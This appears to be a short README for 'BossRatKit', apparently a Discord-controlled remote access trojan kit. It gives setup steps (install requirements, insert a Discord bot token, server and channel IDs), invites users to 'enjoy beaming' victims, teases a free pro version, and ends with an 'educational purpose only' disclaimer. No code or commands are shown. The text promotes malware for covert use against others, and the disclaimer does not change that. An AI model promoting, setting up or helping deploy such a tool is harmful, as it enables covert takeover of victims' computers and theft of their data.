STEP ONE: open the BossRatKit 
STEP TWO: it will install requirements for you 
STEP THREE: Insert your discord bot token, Discord server id, Discord channel id's.

note: enjoy beaming with this tool we hope you have fun for more help reach out to my team or me.

Pro version: Releseing a pro version soon late next week first 10 users will have it for FREE

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
DISCLAIMER I DO NOT RECCOMEND ANY HACKING OR MALWARE LIKE THIS EDUCATINAL PURPOSE ONLY
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!